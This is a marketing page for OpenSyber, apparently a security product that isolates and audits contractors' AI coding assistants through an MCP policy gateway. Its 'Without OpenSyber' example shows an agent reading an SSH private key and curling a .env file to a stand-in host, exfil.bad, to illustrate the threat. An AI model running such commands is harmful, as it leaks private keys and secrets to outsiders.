Skip to content

AI Contractor Runtime Governance

Let Contractors
Use AI On Your Repos
— Safely.

Every external AI-assisted action is isolated, governed, and explainable. Give contractors Claude, Cursor, shell, GitHub, cloud tools, and MCP access without putting your code on unmanaged laptops.

IsolateGovernExplainExport

Free pilot. No managed laptop. No sales call required.

Isolated workspace
Governed MCP
Device-bound identity
Explainable audit
opensyber.cloud/dashboard
87

SCORE

Security Score

3/5

Agents

12

Threats

99.9%

Uptime

Live Event Feed

CRITICALCredential access blocked — agent quarantined
BLOCKEDSupply chain attack blocked — malicious postinstall
INFOSkill audit passed — v1.2.0
OKAgent heartbeat restored
WARNUnusual egress pattern detected — 3 new domains

Built on enterprise-grade infrastructure

Zero-Trust Architecture
Cloudflare Edge
SOC 2 / ISO 27001 evidence
GDPR-aligned controls

Let me ask you something

YOUR CONTRACTOR IS USING CLAUDE RIGHT NOW

On your repo. With your secrets. Through a laptop you don't manage. Existing security assumes a managed device. AI-assisted contractors don't have one.

Without OpenSyber

$ agent exec --tool=shell "cat ~/.ssh/id_rsa"
$ curl -s https://exfil.bad/collect -d @.env
$ npm install totally-legit-pkg@latest

Contractor + Claude + your repo + no visibility.

With OpenSyber

DENIEDUnscoped GitHub token blocked — workspace held
ALERTMCP exfil pattern detected — session paused
AUDITEDProduction Terraform apply blocked by policy

Isolated workspace. MCP gateway. Policy on every tool call. Audit on every action.

The flow

INVITE. ISOLATE. AUDIT.

Three steps. No managed laptop. No VPN. Audit on every AI-assisted action.

STEP 01

INVITE A CONTRACTOR

Email invite plus device-bound enrollment. They open a browser-isolated workspace with Claude, Cursor, and your curated MCP servers pre-installed.

STEP 02

ENFORCE POLICY

Every MCP tool call routes through the OpenSyber gateway. Allow, deny, redact, or step-up. Block prod Terraform. Scope GitHub to a single repo and branch.

STEP 03

AUDIT EVERY ACTION

Prompts, MCP calls, shell commands, and GitHub actions are linked into one chain. Reviewers see exactly what Claude did and which policy approved it.

~/your-project — zsh
$opensyber invite contractor@example.com

Buyer path

FROM DEMO TO GOVERNED CONTRACTOR ACCESS

The first value moment is a denied risky action plus an audit chain. The paid rollout adds identity, SIEM, evidence, and repeatable workspace policy.

90-day readiness program

For security buyers, the pilot output is concrete: an agent inventory, a Trust Graph baseline, starter policies, and exportable evidence mapped to your audit framework.

  • AI contractor inventory
  • Baseline Trust Graph
  • MCP policy set
  • Compliance evidence export

Runtime governance

EVERY ACTION HAS A CHAIN

When a contractor asks Claude to apply Terraform in production, six things happen in order. The gateway sees them all. The audit log keeps them linked.

  1. Contractor
    device-bound session
  2. Claude
    prompt + tool plan
  3. MCP gateway
    policy check
  4. Repo
    scoped PAT
  5. Terraform apply
    prod target
  6. DENIED
    policy: no prod apply

Same chain renders in the audit log. Same chain renders in the compliance export.

AI CONTRACTOR RUNTIME GOVERNANCE

A contractor opens Claude in an isolated workspace and asks for a prod Terraform deploy. Watch the gateway deny, the chain explain why, and the audit row land.

Open the contractor demo

What you get

ONE WORKSPACE, FULL GOVERNANCE

ISOLATED BROWSER WORKSPACE

Contractor opens a hardened browser session. Claude, Cursor, MCP servers and shell are pre-baked. No managed laptop. No VPN. Device-bound session keys via TokenForge.

  • Browser isolation (Kasm)
  • Device-bound contractor identity
  • AI tools and MCP pre-installed

MCP POLICY CHOKEPOINT

Every MCP tool call routes through the OpenSyber gateway. Allow, deny, redact, or step-up auth. Block prod Terraform, force PII redaction, scope GitHub to a single repo and branch.

  • Per-workspace MCP allowlists
  • GitHub policy bridge (scoped PATs)
  • Step-up auth on high-risk tool calls
Explore

EXPLAINABLE AUDIT

Every prompt, MCP call, shell command, and GitHub action is linked into one trail. Reviewers see exactly what Claude did, what file it touched, what cluster it hit, and which policy approved it.

  • Prompt-to-action linking
  • Runtime telemetry (Falco / osquery)
  • SOC 2 / ISO 27001 / HIPAA evidence export
Explore

Integrates with

WORKS WITH YOUR AI, IDENTITY, AND SOC STACK

OpenSyber sits between contractors, coding agents, MCP servers, source control, cloud, identity, and your SIEM. No rip-and-replace.

Anthropic
Cursor
Windsurf
VS Code
Claude Desktop
GitHub
GitLab
Okta
Entra ID
AWS
Cloudflare
Splunk
Datadog
Sentinel

Integrations and connectors. Names are trademarks of their respective owners; listing does not imply endorsement.

The four outcomes

DISCOVER. GOVERN. PROTECT. AUDIT.

One workspace covers the full lifecycle of AI-assisted access to your repos and infra — from the first unknown agent to the last audited action.

DISCOVER

See every AI agent, MCP server, and shadow-AI tool touching your stack.

  • Full AI agent inventory across teams and contractors
  • MCP server and tool discovery
  • Shadow-AI detection for unsanctioned assistants

Surface known and shadow AI assets across your connected workspaces

GOVERN

Decide what AI can do before it does it, not after.

  • Policy engine as an MCP chokepoint
  • Approval workflows for sensitive actions
  • Per-agent permissions scoped to repos and infra

Block unauthorized AI actions before they run

PROTECT

Stop secret leaks, prompt injection, and poisoned MCP tools at runtime.

  • Secret protection and prompt-injection detection
  • MCP rug-pull and cross-session drift detection
  • Supply-chain scanning with browser isolation

Catch MCP rug-pulls others miss — across days, not one session

AUDIT

Prove what every AI action did, mapped to repo and infra changes.

  • Explainable audit trail for every agent action
  • AI Act, SOC 2, and ISO 27001 evidence generation
  • Compliance-ready exports on demand

Audit-ready evidence on every AI action

The flagship view

THE TRUST GRAPH

See every relationship between your users, agents, prompts, tools, MCP servers, databases, secrets, and models. One graph that maps how access actually flows across your AI estate.

User
Agent
Prompt
Tool
MCP Server
Database
Secret
Model

Questions it answers instantly

Which agents can access customer data?

Which tools use production credentials?

What is the blast radius if this agent is compromised?

What systems are affected when something breaks?

GOVERN THE AI YOUR CONTRACTORS ALREADY USE

Your contractors are running Claude and Cursor against your repos right now. Keep guessing what they did, or put a gateway and an audit trail between them and prod.

  • IsolateBrowser-isolated workspace. Code, secrets, and MCP servers never touch the contractor's laptop.
  • GovernEvery Claude and Cursor tool call hits the MCP policy chokepoint: allow, step-up, or deny per call.
  • AuditEvery AI action is linked to the repo or infra action it caused — one explainable, compliance-ready trail.

No managed laptop. No VPN. No sales call.